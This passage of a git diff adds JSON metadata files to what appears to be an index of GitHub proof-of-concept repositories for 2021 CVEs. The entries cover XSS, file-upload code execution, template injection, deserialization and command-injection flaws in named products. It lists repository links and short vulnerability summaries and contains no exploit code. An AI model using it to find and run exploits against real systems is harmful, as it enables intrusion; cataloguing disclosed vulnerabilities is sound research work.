"https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.", + "fork": false, + "created_at": "2021-12-28T14:29:44Z", + "updated_at": "2022-01-14T19:44:54Z", + "pushed_at": "2022-01-14T19:47:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448089503, + "name": "CVE-2021-46073", + "full_name": "plsanu\/CVE-2021-46073", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46073", + "description": "CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.", + "fork": false, + "created_at": "2022-01-14T19:49:07Z", + "updated_at": "2023-12-30T08:24:07Z", + "pushed_at": "2022-01-14T19:49:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46074.json b/2021/CVE-2021-46074.json new file mode 100644 index 0000000000..09ff99277a --- /dev/null +++ b/2021/CVE-2021-46074.json @@ -0,0 +1,64 @@ +[ + { + "id": 442490679, + "name": "Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel.", + "fork": false, + "created_at": "2021-12-28T14:37:00Z", + "updated_at": "2022-01-14T19:58:38Z", + "pushed_at": "2022-01-14T20:01:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448092556, + "name": "CVE-2021-46074", + "full_name": "plsanu\/CVE-2021-46074", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46074", + "description": "CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel.", + "fork": false, + "created_at": "2022-01-14T20:01:50Z", + "updated_at": "2023-12-30T08:24:03Z", + "pushed_at": "2022-01-14T20:02:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46075.json b/2021/CVE-2021-46075.json new file mode 100644 index 0000000000..68f57776eb --- /dev/null +++ b/2021/CVE-2021-46075.json @@ -0,0 +1,64 @@ +[ + { + "id": 442493273, + "name": "Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations", + "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations", + "description": "CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.", + "fork": false, + "created_at": "2021-12-28T14:46:13Z", + "updated_at": "2022-01-14T20:10:51Z", + "pushed_at": "2022-01-14T20:14:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448095827, + "name": "CVE-2021-46075", + "full_name": "plsanu\/CVE-2021-46075", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46075", + "description": "CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.", + "fork": false, + "created_at": "2022-01-14T20:15:28Z", + "updated_at": "2023-12-30T08:24:01Z", + "pushed_at": "2022-01-14T20:16:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46076.json b/2021/CVE-2021-46076.json new file mode 100644 index 0000000000..c7bda1a76d --- /dev/null +++ b/2021/CVE-2021-46076.json @@ -0,0 +1,64 @@ +[ + { + "id": 442497045, + "name": "Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution", + "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution", + "description": "CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.", + "fork": false, + "created_at": "2021-12-28T15:00:17Z", + "updated_at": "2022-01-14T20:22:51Z", + "pushed_at": "2022-01-14T20:27:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448098738, + "name": "CVE-2021-46076", + "full_name": "plsanu\/CVE-2021-46076", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46076", + "description": "CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.", + "fork": false, + "created_at": "2022-01-14T20:28:01Z", + "updated_at": "2023-12-30T08:23:57Z", + "pushed_at": "2022-01-14T20:28:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46078.json b/2021/CVE-2021-46078.json new file mode 100644 index 0000000000..ade7a55f7e --- /dev/null +++ b/2021/CVE-2021-46078.json @@ -0,0 +1,64 @@ +[ + { + "id": 442506922, + "name": "Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting", + "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting", + "description": "CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.", + "fork": false, + "created_at": "2021-12-28T15:35:20Z", + "updated_at": "2022-01-14T20:45:28Z", + "pushed_at": "2022-01-14T20:48:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448103762, + "name": "CVE-2021-46078", + "full_name": "plsanu\/CVE-2021-46078", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46078", + "description": "CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.", + "fork": false, + "created_at": "2022-01-14T20:49:42Z", + "updated_at": "2023-12-30T08:23:53Z", + "pushed_at": "2022-01-14T20:50:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46079.json b/2021/CVE-2021-46079.json new file mode 100644 index 0000000000..0b1b03dd7f --- /dev/null +++ b/2021/CVE-2021-46079.json @@ -0,0 +1,64 @@ +[ + { + "id": 442547992, + "name": "Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection", + "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection", + "description": "CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.", + "fork": false, + "created_at": "2021-12-28T18:17:36Z", + "updated_at": "2022-01-14T21:15:54Z", + "pushed_at": "2022-01-14T21:19:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448111645, + "name": "CVE-2021-46079", + "full_name": "plsanu\/CVE-2021-46079", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46079", + "description": "CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.", + "fork": false, + "created_at": "2022-01-14T21:26:02Z", + "updated_at": "2023-12-30T08:23:50Z", + "pushed_at": "2022-01-14T21:27:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46080.json b/2021/CVE-2021-46080.json new file mode 100644 index 0000000000..31a52b65a5 --- /dev/null +++ b/2021/CVE-2021-46080.json @@ -0,0 +1,64 @@ +[ + { + "id": 442549429, + "name": "Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS", + "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS", + "description": "CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.", + "fork": false, + "created_at": "2021-12-28T18:23:42Z", + "updated_at": "2022-01-30T06:08:01Z", + "pushed_at": "2022-01-14T21:59:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448115642, + "name": "CVE-2021-46080", + "full_name": "plsanu\/CVE-2021-46080", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46080", + "description": "CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.", + "fork": false, + "created_at": "2022-01-14T21:45:58Z", + "updated_at": "2023-12-30T08:23:46Z", + "pushed_at": "2022-01-14T21:58:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46108.json b/2021/CVE-2021-46108.json new file mode 100644 index 0000000000..623f6812d2 --- /dev/null +++ b/2021/CVE-2021-46108.json @@ -0,0 +1,33 @@ +[ + { + "id": 454438577, + "name": "CVE-2021-46108", + "full_name": "g-rubert\/CVE-2021-46108", + "owner": { + "login": "g-rubert", + "id": 40837605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40837605?v=4", + "html_url": "https:\/\/github.com\/g-rubert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-rubert\/CVE-2021-46108", + "description": " Stored Cross-Site Scripting - D-Link", + "fork": false, + "created_at": "2022-02-01T15:21:15Z", + "updated_at": "2022-02-01T15:37:47Z", + "pushed_at": "2022-05-05T14:58:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46143.json b/2021/CVE-2021-46143.json new file mode 100644 index 0000000000..18b9b48111 --- /dev/null +++ b/2021/CVE-2021-46143.json @@ -0,0 +1,33 @@ +[ + { + "id": 480370483, + "name": "external_expat_AOSP10_r33_CVE-2021-46143", + "full_name": "nanopathi\/external_expat_AOSP10_r33_CVE-2021-46143", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/external_expat_AOSP10_r33_CVE-2021-46143", + "description": null, + "fork": false, + "created_at": "2022-04-11T12:29:22Z", + "updated_at": "2022-04-11T12:57:15Z", + "pushed_at": "2022-04-11T12:58:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46361.json b/2021/CVE-2021-46361.json new file mode 100644 index 0000000000..c1aab25144 --- /dev/null +++ b/2021/CVE-2021-46361.json @@ -0,0 +1,42 @@ +[ + { + "id": 758677884, + "name": "CVE-2021-46361", + "full_name": "mbadanoiu\/CVE-2021-46361", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46361", + "description": "CVE-2021-46361: FreeMarker Restriction Bypass in Magnolia CMS", + "fork": false, + "created_at": "2024-02-16T20:36:32Z", + "updated_at": "2024-03-25T07:57:35Z", + "pushed_at": "2024-02-16T20:50:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2021-46361", + "cves", + "remote-code-execution", + "server-side-template-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46362.json b/2021/CVE-2021-46362.json new file mode 100644 index 0000000000..bb51f3ee78 --- /dev/null +++ b/2021/CVE-2021-46362.json @@ -0,0 +1,40 @@ +[ + { + "id": 757003959, + "name": "CVE-2021-46362", + "full_name": "mbadanoiu\/CVE-2021-46362", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46362", + "description": "CVE-2021-46362: FreeMarker Server-Side Template Injection in Magnolia CMS", + "fork": false, + "created_at": "2024-02-13T18:08:02Z", + "updated_at": "2024-02-14T09:51:22Z", + "pushed_at": "2024-02-14T08:37:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2021-46362", + "cves", + "server-side-template-injection", + "unauthenticated" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46363.json b/2021/CVE-2021-46363.json new file mode 100644 index 0000000000..149fb4cc4b --- /dev/null +++ b/2021/CVE-2021-46363.json @@ -0,0 +1,40 @@ +[ + { + "id": 757111019, + "name": "CVE-2021-46363", + "full_name": "mbadanoiu\/CVE-2021-46363", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46363", + "description": "CVE-2021-46363: Formula Injection in Magnolia CMS", + "fork": false, + "created_at": "2024-02-13T20:36:24Z", + "updated_at": "2024-02-13T20:50:51Z", + "pushed_at": "2024-02-13T20:47:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "csv-injection", + "cve", + "cve-2021-46363", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46364.json b/2021/CVE-2021-46364.json new file mode 100644 index 0000000000..8674eee47b --- /dev/null +++ b/2021/CVE-2021-46364.json @@ -0,0 +1,41 @@ +[ + { + "id": 722765060, + "name": "CVE-2021-46364", + "full_name": "mbadanoiu\/CVE-2021-46364", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46364", + "description": "CVE-2021-46364: YAML Deserialization in Magnolia CMS", + "fork": false, + "created_at": "2023-11-23T22:37:01Z", + "updated_at": "2024-06-17T13:06:03Z", + "pushed_at": "2023-11-23T22:42:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2021-46364", + "cves", + "deserialization", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46365.json b/2021/CVE-2021-46365.json new file mode 100644 index 0000000000..5057a58b87 --- /dev/null +++ b/2021/CVE-2021-46365.json @@ -0,0 +1,40 @@ +[ + { + "id": 757116903, + "name": "CVE-2021-46365", + "full_name": "mbadanoiu\/CVE-2021-46365", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46365", + "description": "CVE-2021-46365: Unsafe XML Parsing in Magnolia CMS", + "fork": false, + "created_at": "2024-02-13T20:52:49Z", + "updated_at": "2024-02-13T21:05:16Z", + "pushed_at": "2024-02-13T21:00:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2021-46365", + "cves", + "xxe" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46366.json b/2021/CVE-2021-46366.json new file mode 100644 index 0000000000..e443bceb91 --- /dev/null +++ b/2021/CVE-2021-46366.json @@ -0,0 +1,40 @@ +[ + { + "id": 757122830, + "name": "CVE-2021-46366", + "full_name": "mbadanoiu\/CVE-2021-46366", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46366", + "description": "CVE-2021-46366: Credential Bruteforce Attack via CSRF + Open Redirect in Magnolia CMS", + "fork": false, + "created_at": "2024-02-13T21:09:53Z", + "updated_at": "2024-02-13T21:25:46Z", + "pushed_at": "2024-02-13T21:20:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "csrf", + "cve", + "cve-2021-46366", + "cves", + "open-redirect" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46381.json b/2021/CVE-2021-46381.json new file mode 100644 index 0000000000..92335b58aa --- /dev/null +++ b/2021/CVE-2021-46381.json @@ -0,0 +1,33 @@ +[ + { + "id": 498296485, + "name": "-cve-2021-46381", + "full_name": "JCPpeiqi\/-cve-2021-46381", + "owner": { + "login": "JCPpeiqi", + "id": 106591002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106591002?v=4", + "html_url": "https:\/\/github.com\/JCPpeiqi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JCPpeiqi\/-cve-2021-46381", + "description": null, + "fork": false, + "created_at": "2022-05-31T10:54:40Z", + "updated_at": "2022-05-31T11:01:14Z", + "pushed_at": "2022-05-31T11:01:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46398.json b/2021/CVE-2021-46398.json new file mode 100644 index 0000000000..5d53e7b7b5 --- /dev/null +++ b/2021/CVE-2021-46398.json @@ -0,0 +1,64 @@ +[ + { + "id": 472870293, + "name": "CVE-2021-46398_Chamilo-LMS-RCE", + "full_name": "febinrev\/CVE-2021-46398_Chamilo-LMS-RCE", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/CVE-2021-46398_Chamilo-LMS-RCE", + "description": "Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.", + "fork": false, + "created_at": "2022-03-22T17:35:38Z", + "updated_at": "2024-08-12T20:21:46Z", + "pushed_at": "2022-03-22T17:47:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 584703298, + "name": "CVE-2021-46398", + "full_name": "LalieA\/CVE-2021-46398", + "owner": { + "login": "LalieA", + "id": 83229713, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83229713?v=4", + "html_url": "https:\/\/github.com\/LalieA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LalieA\/CVE-2021-46398", + "description": "A Proof of Concept for the CVE-2021-46398 flaw exploitation ", + "fork": false, + "created_at": "2023-01-03T09:49:22Z", + "updated_at": "2023-09-10T23:05:12Z", + "pushed_at": "2023-09-10T23:04:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46417.json b/2021/CVE-2021-46417.json new file mode 100644 index 0000000000..967ad00c78 --- /dev/null +++ b/2021/CVE-2021-46417.json @@ -0,0 +1,33 @@ +[ + { + "id": 493590968, + "name": "CVE-2021-46417", + "full_name": "Henry4E36\/CVE-2021-46417", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2021-46417", + "description": "Franklin Fueling Systems Colibri Controller Module - Local File Inclusion", + "fork": false, + "created_at": "2022-05-18T09:14:51Z", + "updated_at": "2022-05-18T09:18:36Z", + "pushed_at": "2022-05-18T09:18:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46422.json b/2021/CVE-2021-46422.json new file mode 100644 index 0000000000..52b8729a4b --- /dev/null +++ b/2021/CVE-2021-46422.json @@ -0,0 +1,436 @@ +[ + { + "id": 495909507, + "name": "CVE-2021-46422", + "full_name": "nobodyatall648\/CVE-2021-46422", + "owner": { + "login": "nobodyatall648", + "id": 35725871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2021-46422", + "description": "SDT-CW3B1 1.1.0 - OS Command Injection", + "fork": false, + "created_at": "2022-05-24T16:45:41Z", + 